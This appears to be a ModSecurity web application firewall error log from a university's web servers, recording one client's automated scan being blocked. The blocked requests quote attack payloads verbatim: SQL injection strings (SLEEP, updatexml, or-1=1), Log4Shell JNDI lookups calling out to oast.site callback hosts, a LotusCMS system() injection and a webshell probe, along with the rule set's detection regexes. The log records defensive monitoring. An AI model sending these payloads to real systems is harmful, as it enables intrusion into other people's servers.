[Tue Aug 29 11:30:24.376761 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:post_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:post_id: 1 AND (SELECT 1626 FROM (SELECT(SLEEP(6)))niPH)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10YMCo-f0AAAOOuT0AAAAW"]
[Tue Aug 29 11:30:25.312501 2023] [:error] [pid 902] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: `;-- - found within ARGS:USERNAME: ')or`1`=`1`;-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10YcCo-f0AAAOGafgAAAAS"]
[Tue Aug 29 11:30:25.335960 2023] [:error] [pid 959] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: `;-- - found within ARGS:USERNAME: ')or`1`=`1`;-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10YcCo-f0AAAO-1owAAAAI"]
[Tue Aug 29 11:30:25.336584 2023] [:error] [pid 991] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:username: ${jndi:ldap://${:-239}${:-529}.${hostName}.username.cjmn8l5jmimk2adbbnlgx4kerasusrmn7.oast.site/test}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO10YcCo-f0AAAPfm7YAAAAR"]
[Tue Aug 29 11:30:25.341559 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: `;-- - found within ARGS:USERNAME: ')or`1`=`1`;-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10YcCo-f0AAAO874sAAAAF"]
[Tue Aug 29 11:30:25.386899 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:username: ${jndi:ldap://${:-239}${:-529}.${hostName}.username.cjmn8l5jmimk2adbbnlg4kjii5fdxg18c.oast.site/test}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO10YcCo-f0AAAOM4VwAAAAU"]
[Tue Aug 29 11:30:25.408248 2023] [:error] [pid 964] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:username: ${jndi:ldap://${:-239}${:-529}.${hostName}.username.cjmn8l5jmimk2adbbnlgb9o874xapmca3.oast.site/test}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO10YcCo-f0AAAPENcUAAAAQ"]
[Tue Aug 29 11:30:25.408301 2023] [:error] [pid 902] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:username: ${jndi:ldap://${:-239}${:-529}.${hostName}.username.cjmn8l5jmimk2adbbnlgytxay8umbpn86.oast.site/test}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO10YcCo-f0AAAOGafoAAAAS"]
[Tue Aug 29 11:30:25.409937 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:username: ${jndi:ldap://${:-239}${:-529}.${hostName}.username.cjmn8l5jmimk2adbbnlg5yqawqfassp76.oast.site/test}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO10YcCo-f0AAAOM4V0AAAAU"]
[Tue Aug 29 11:30:25.420184 2023] [:error] [pid 983] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: `;-- - found within ARGS:USERNAME: ')or`1`=`1`;-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO10YcCo-f0AAAPXAk0AAAAi"]
[Tue Aug 29 11:30:25.537106 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: `;-- - found within ARGS:USERNAME: ')or`1`=`1`;-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10YcCo-f0AAAOM4V4AAAAU"]
[Tue Aug 29 11:30:25.604587 2023] [:error] [pid 986] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:ant. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:ant: echo md5(\\x22antproxy.php\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/.antproxy.php"] [unique_id "ZO10YcCo-f0AAAPahvcAAAAL"]
[Tue Aug 29 11:30:26.308567 2023] [:error] [pid 903] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:ant. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:ant: echo md5(\\x22antproxy.php\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/.antproxy.php"] [unique_id "ZO10YsCo-f0AAAOH4SgAAAAH"]
[Tue Aug 29 11:30:26.309252 2023] [:error] [pid 972] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:ant. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:ant: echo md5(\\x22antproxy.php\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/.antproxy.php"] [unique_id "ZO10YsCo-f0AAAPMl-UAAAAY"]
[Tue Aug 29 11:30:26.310529 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:ant. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:ant: echo md5(\\x22antproxy.php\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/.antproxy.php"] [unique_id "ZO10YsCo-f0AAAOM4WAAAAAU"]
[Tue Aug 29 11:30:26.310544 2023] [:error] [pid 959] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:ant. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:ant: echo md5(\\x22antproxy.php\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/.antproxy.php"] [unique_id "ZO10YsCo-f0AAAO-1o4AAAAI"]
[Tue Aug 29 11:30:26.327529 2023] [:error] [pid 956] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: `;-- - found within ARGS:USERNAME: ')or`1`=`1`;-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/account/index.php"] [unique_id "ZO10YsCo-f0AAAO8744AAAAF"]
[Tue Aug 29 11:30:26.335436 2023] [:error] [pid 976] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:post_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:post_id: 1 AND (SELECT 1626 FROM (SELECT(SLEEP(6)))niPH)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO10YsCo-f0AAAPQkfUAAAAe"]
[Tue Aug 29 11:30:26.368123 2023] [:error] [pid 908] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:username: ${jndi:ldap://${:-239}${:-529}.${hostName}.username.cjmn8l5jmimk2adbbnlg6syrqkdp7uehi.oast.site/test}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO10YsCo-f0AAAOM4WEAAAAU"]
[Tue Aug 29 11:30:26.384543 2023] [:error] [pid 973] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:ant. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:ant: echo md5(\\x22antproxy.php\\x22);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/.antproxy.php"] [unique_id "ZO10YsCo-f0AAAPNBRkAAAAZ"]
[Tue Aug 29 11:30:27.493275 2023] [:error] [pid 904] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: `;-- - found within ARGS:USERNAME: ')or`1`=`1`;-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/opensis/index.php"] [unique_id "ZO10Y8Co-f0AAAOIvUEAAAAM"]
[Tue Aug 29 11:30:28.367226 2023] [:error] [pid 973] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:categoryId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'zzz'='zzz found within ARGS:categoryId: 1' and updatexml(1,concat(0x7e,md5(999999999),0x7e),1) and 'zzz'='zzz"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/cms/content/list"] [unique_id "ZO10ZMCo-f0AAAPNBR8AAAAZ"]
[Tue Aug 29 11:30:28.368912 2023] [:error] [pid 867] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:categoryId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'zzz'='zzz found within ARGS:categoryId: 1' and updatexml(1,concat(0x7e,md5(999999999),0x7e),1) and 'zzz'='zzz"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/cms/content/list"] [unique_id "ZO10ZMCo-f0AAANjpx8AAAAT"]
[Tue Aug 29 11:30:28.392107 2023] [:error] [pid 906] [client 143.42.78.27] ModSecurity: Rule 7fe1ce5b6070 [id "981173"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "159"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "pusatbahasa.unla.ac.id"] [uri "/CTCWebService/CTCWebServiceBean/ConfigServlet"] [unique_id "ZO10ZMCo-f0AAAOKNnYAAAAK"]
[Tue Aug 29 11:30:28.394592 2023] [:error] [pid 964] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:USERNAME. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: `;-- - found within ARGS:USERNAME: ')or`1`=`1`;-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10ZMCo-f0AAAPENc4AAAAQ"]
[Tue Aug 29 11:30:28.396072 2023] [:error] [pid 991] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:categoryId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'zzz'='zzz found within ARGS:categoryId: 1' and updatexml(1,concat(0x7e,md5(999999999),0x7e),1) and 'zzz'='zzz"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/cms/content/list"] [unique_id "ZO10ZMCo-f0AAAPfm8EAAAAR"]
[Tue Aug 29 11:30:28.397174 2023] [:error] [pid 975] [client 143.42.78.27] ModSecurity: Rule 7fe1c58deef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "ft.unla.ac.id"] [uri "/CTCWebService/CTCWebServiceBean/ConfigServlet"] [unique_id "ZO10ZMCo-f0AAAPPSvIAAAAd"]
[Tue Aug 29 11:30:28.401657 2023] [:error] [pid 906] [client 143.42.78.27] ModSecurity: Rule 7fe1c58deef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "pusatbahasa.unla.ac.id"] [uri "/CTCWebService/CTCWebServiceBean/ConfigServlet"] [unique_id "ZO10ZMCo-f0AAAOKNnYAAAAK"]
[Tue Aug 29 11:30:28.415806 2023] [:error] [pid 903] [client 143.42.78.27] ModSecurity: Rule 7fe1ce5b6070 [id "981173"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"][line "159"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "journal.unla.ac.id"] [uri "/CTCWebService/CTCWebServiceBean/ConfigServlet"] [unique_id "ZO10ZMCo-f0AAAOH4TAAAAAH"]
[Tue Aug 29 11:30:28.425528 2023] [:error] [pid 903] [client 143.42.78.27] ModSecurity: Rule 7fe1c58deef8 [id "973302"][file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"][line "309"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "journal.unla.ac.id"] [uri "/CTCWebService/CTCWebServiceBean/ConfigServlet"] [unique_id "ZO10ZMCo-f0AAAOH4TAAAAAH"]
[Tue Aug 29 11:30:29.322728 2023] [:error] [pid 910] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ');${ found within ARGS:page: index');${system('echo lotuscms_rce | md5sum')};#\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO10ZcCo-f0AAAOOuUYAAAAW"]
[Tue Aug 29 11:30:29.367733 2023] [:error] [pid 906] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:categoryId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'zzz'='zzz found within ARGS:categoryId: 1' and updatexml(1,concat(0x7e,md5(999999999),0x7e),1) and 'zzz'='zzz"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/cms/content/list"] [unique_id "ZO10ZcCo-f0AAAOKNnkAAAAK"]
[Tue Aug 29 11:30:29.367895 2023] [:error] [pid 865] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:categoryId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'zzz'='zzz found within ARGS:categoryId: 1' and updatexml(1,concat(0x7e,md5(999999999),0x7e),1) and 'zzz'='zzz"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cms/content/list"] [unique_id "ZO10ZcCo-f0AAANh1qwAAAAA"]
